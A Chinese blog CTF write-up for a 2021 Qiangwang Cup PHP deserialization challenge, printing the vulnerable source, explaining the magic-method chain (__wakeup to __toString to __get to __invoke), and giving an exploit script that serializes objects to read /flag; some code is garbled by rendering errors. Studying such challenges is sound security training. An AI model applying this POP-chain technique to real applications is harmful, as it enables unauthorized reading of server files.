2021-07-22ctf2021强网杯wp赌徒反序列化

最新推荐文章于 2023-01-09 21:23:46 发布
最新推荐文章于 2023-01-09 21:23:46 发布
阅读量635 收藏 1
点赞数
分类专栏: CTF
原文链接:https://blog.csdn.net/weixin_51353029/article/details/117920232
版权

class Start
{
public $name=‘guest’;
public $flag=‘syst3m(“cat 127.0.0.1/etc/hint”);’;

public function __construct(){
    echo "I think you need /etc/hint . Before this you need to see the source code";
}

public function _sayhello(){
    echo $this->name;
    return 'ok';
}

public function __wakeup(){
    echo "hi";
    $this->_sayhello();
}
public function __get($cc){
    echo "give you flag : ".$this->flag;
    return ;
}

}

class Info
{
private $phonenumber=123123;
public $promise=‘I do’;

public function __construct(){
    $this->promise='I will not !!!!';
    return $this->promise;
}

public function __toString(){
    return $this->file['filename']->ffiillee['ffiilleennaammee'];
}

}

class Room
{
public $filename=’/flag’;
public $sth_to_set;
public $a=’’;

public function __get($name){
    $function = $this->a;
    return $function();
}

public function Get_hint($file){
    $hint=base64_encode(file_get_contents($file));
    echo $hint;
    return ;
}

public function __invoke(){
    $content = $this->Get_hint($this->filename);
    echo $content;
}

}

if(isset(KaTeX parse error: Expected '}', got 'EOF' at end of input: … unserialize(_GET[‘hello’]);
}else{
$hi = new Start();
}

?>

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • 57
  • 58
  • 59
  • 60
  • 61
  • 62
  • 63
  • 64
  • 65
  • 66
  • 67
  • 68
  • 69
  • 70
  • 71
  • 72
  • 73
  • 74
  • 75

是一道反序列化的题目,首先想到的应该是寻找_destruct,_construct方法看是否有命令执行的地方,
这里只存在一个__construct方法。这个方法不大行

public function __construct(){
        $this->promise='I will not !!!!';
        return $this->promise;
    }

 
 
 
 
  • 1
  • 2
  • 3
  • 4

分析

其次在寻找魔法函数的时候,在ROOM类里面可以看见有一个get_hint方法,那么这个方法极大可能是我们最后需要调用的方法。
接下从这个方法往前面推,要想调用get_hint,必须调用_invoke(),_invoke是一个魔法函数,把实例化的对象当成函数使用,就会自动调用:

__invoke

举个例子:

<?php 
	class test1()
	{
	public $a='abc';
	public function __invoke()
		{
			echo “invoke !!\n”;
		}
	}
	$dog=new test1();
	$dog('123');
	$dog();
	//输出内容: invoke !!  invoke !!

 
 
 
 
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13

知道了上面的调用方法,接下来再去寻找一下return的地方,因为这里要调用__invoke要求严格,必须先实例化,在当成函数使用,也就是说,必须是return Room();
而大多数return里面,仅仅return字符串,所以这样一来,我们能利用的return也就只有一个地方了:

    public function __get($name){
       $function = $this->a;
       return $function();
   }

 
 
 
 
  • 1
  • 2
  • 3
  • 4

a参数可控,这里可以让this->$a=new Room();后面return $function()的时候就是一个方法了。
!!这里自己当时被坑了一下,没有看见$function后面的括号!!

到目前为止,我们已经知道可以通过Room里面的__get方法可以调用__invoke方法拿到FLAG
接下来看一看,如何调用__get方法:

__get

__get方法调用条件是:访问一个私有属性或者一个不存在(没有初始化)的属性,举个例子:

<?php 
 class test1
 {
     public $a='1';
     private $c='2';
     public function __get($name)
     {
         echo "__get!!! \n";

 }

}
$b=new test1();
KaTeX parse error: Expected 'EOF', got '&' at position 3: b-&̲gt;a;
KaTeX parse error: Expected 'EOF', got '&' at position 3: b-&̲gt;c;
KaTeX parse error: Expected 'EOF', got '&' at position 3: b-&̲gt;asdas;
//输出: _get!!! _get!!! __get!!!

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17

知道了怎么调用__get后,再去其他两个类寻找一下入口:

// class info
public function __toString(){
     return $this->file['filename']->ffiillee['ffiilleennaammee'];
 }

 
 
 
 
  • 1
  • 2
  • 3
  • 4

那么很显然,要调用Room中的__get方法,这里__tostring方法中的file[‘filename’]应该是new Room(),fifilee[
ffiilleennaammee]不存在 ,就可以调用了那么如何调用_tostring方法

_tostring

_tostring方法在输出、打印实例化对象的时候被调用,举个例子:

<?php 
 class test1
 {
     public $a='1';
     private $c='2';
     public function __tostring()
     {
         echo '__tostring!!';
     }
 }
 $b=new test1();
 echo new test1();
 echo $b;

 
 
 
 
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13

接下来就是去找可以echo或者return的地方

//class Start
public function _sayhello(){
        echo $this->name;
        return 'ok';
    }

 
 
 
 
  • 1
  • 2
  • 3
  • 4
  • 5

接下来就是顺理成章的调用_sayhello ,剩下的就很简单了,实例化Start类,自动调用wakeup方法,从而调用_sayhello方法,参数我们都可以控制

EXP

<?php
class Start{}
class Info{}
class Room{
public function __construct(){
$this->filename = "/flag";
}
}
$a = new Start();
$b = new Info();
$c = new Room();
$c->a = new Room();
$b->file['filename'] = $c;
$a->name = $b;
echo serialize($a);
?>

 
 
 
 
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16

调用流程:

从下往上依次调用
在这里插入图片描述

总结

这道题还是比较基础,都是考察简单的魔术方法,基础很重要,复现的时候可以自己搭环境调试看看整个流程。
有写得不对的地方,希望师傅们指出

热热的雨夜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
备战CTF做题题解
weixin_40707492的博客
07-21 6091
备战CTF初期,没有什么经验,部分操作过程有借鉴大佬
2021杯Writeup--by Nu1L Team.pdf
06-15
第五届“杯”全国络安全挑战赛
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972 工作于 VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark: 对于vCenter6.7 U2 + vCenter 6.7U2 +在内存中运行站,因此此Exp不适用于6.7 u2 +。 需要测试 vCenter 6.5 Linux(VCSA)/窗口等待测试 vCenter 6.7 Linux(VCSA)/窗口等待测试 vCenter 7.0 Linux(VCSA)/窗口等待测试 细节 突破为任意文件上传 存在问题的接口为/ui/vropspluginui/rest/services/uploadova ,完整路径( https://domain.com/ui/vropspluginui/r
CTF中文件包含漏洞总结
热门推荐
Lethe's Blog
02-13 4万+
CTF中文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否...
CTFshow_萌新(web)
果粒程
01-09 459
CTFshow_萌新(web)
BUUCTF 加固题 Ezsql WriteUp
柠檬i的博客
01-15 7608
本题的web界面是登录界面,界面含有sql注入漏洞,题目要求进入目标服务器修复漏洞,然后进行Check,Check True即可返回flag值
CTF-字符编码
weixin_30802171的博客
05-05 403
诞生——ASCII码   ASCII 码使用指定的7 位或8 位二进制数组合来表示128 或256种可能的字符   用8个比特(bit)作为一个字节(byte),所以一个字节最大能表示的整数就是255 GB2312编码 Unicode   两个字节表示一个字符   ASCII码是一个字节,Unicode码是两个字节 Unicode      两个字节表示一个字符   AS...
第五届杯全国络安全挑战赛writeup
渗透测试研究中心
12-23 6991
Web1.[先锋]寻宝下发赛题,访问链接如下:该题需要你通过信息 1 和信息 2 分别获取两段 Key 值,输入 Key1 和 Key2 然后解密。Key1之代码审计点击“信息1”,发现是代码审计:完整源码如下:<?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__...
由<meta charset=“UTF-8“>引发的血案--常见字符编码解析
ANNaScripter的博客
07-22 6196
我作为一名热爱前端的程序猿居然!!在之前没有仔细深究过<meta charset="UTF-8">, 今晨痛定思痛,赶紧看了好几个博客,字符编码是真的博大精深啊~~ 最近要找实习,时间有限,以后一定把底层原理写个明白 编码名 解释 备注 ASCII 1、ASCII编码每个字母或符号占1byte(8bits),并且8bits的最高位是0,因此ASCII能编码的字母和符号只有128个。有一些编
记一道ctf序列POP链构造
weixin_43263451的博客
10-16 1935
<?php class Tiger{ public $string; protected $var; public function __toString(){ return $this->string; } public function boss($value){ @eval($value); } public function __invoke(){ $this->boss(...
zer0pts-CTF-2021:zer0pts CTF 2021
05-06
zer0pts-CTF-2021zer0pts CTF 2021和彩云分流:链接: 提取码:gZce
2018CTF-题目整理-校本图片Readme.zip
最新发布
12-18
2018CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── 题目名称:...
2021-河南省金盾杯-部分题目wp(详细)
02-06
WEB:上传你的头像吧、上传你的压缩包吧、管理员才能拿flag Crypto:Hi There、低音吉他谱、未完成的宣传图 Misc:潦草的笔记、这可是关键信息、hello-world Reverse:Re1、Re2、Re4
魔术方法__get()、__set()和__call()的用法
cqn2bd2b的博客
10-31 221
_get()、__set() 和__call()是很常用的,虽然不像__construct、__destruct运用的那么多,但是它们地位也是毋庸置疑的,__construct、__destruct大家肯定非常熟悉了,在这就不多说了,直接看—————__get()、__set() 和__call();刚开始学习魔术方法时对__get()、__set() 和__call()的用法和作用不是太了解,也有一些误解。__get()是访问不存在的成员变量时调用的;__set()是设置不存在的成员变量时调用的;
ctf之web小白必备JavaScip知识
qq_48511129的博客
02-03 379
JavaScript的代码嵌入在HTML里,直接在客户端的浏览器上执行,属于前端语言。 大多数的xss代码都是使用JavaScript语言编写的。 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>javascipt</title> </head> <body> <script>
BUUCTF刷题记录(4)
bmth666的博客
04-12 1282
文章目录web[ACTF2020 新生赛]Upload web [ACTF2020 新生赛]Upload 和之前极客大挑战一样的题,上传后缀为phtml即可 连上蚁剑,即可得到flag
CTFweb篇——GET&POST
suiyideAli的博客
09-21 2万+
0x00 前言 1. 首先使用BurpSuite 抓取一个http文件进行分析 2. 左边为请求信息,右边为响应信息;请求信息有三部分组成,分别为请求行、请求头、和请求正文组成。响应信息也有三部分组成,分别为响应行、响应 头、响应正文。 3. 首先可以看一下请求行 GET /index.php?tn=monline_3_dg HTTP/1.1 GET方法。GET方法用于获...
【Web方向】 3-1 PHP序列buuCTF实例UnserializeOne wp
wanderer的博客
11-16 442
BUUCTF PHP序列UnserializeOne wp,过程有点绕脑……
ctf php序列
06-07
CTF中的PHP序列攻击主要针对使用PHP的Web应用程序,攻击者可以利用PHP序列漏洞来执行恶意代码或者获取敏感信息。攻击者通常会通过构造恶意的序列数据来触发漏洞,从而实现攻击的目的。 在实际攻击中,攻击者通常会在Cookie、GET或POST参数中注入恶意的序列数据,然后通过触发漏洞来执行恶意代码或获取敏感信息。为了防止这种攻击,应用程序开发人员需要对输入进行严格的过滤和验证,并且尽可能避免使用序列功能。此外,还可以使用专门的安全框架来防止这种攻击,比如PHP的Suhosin扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值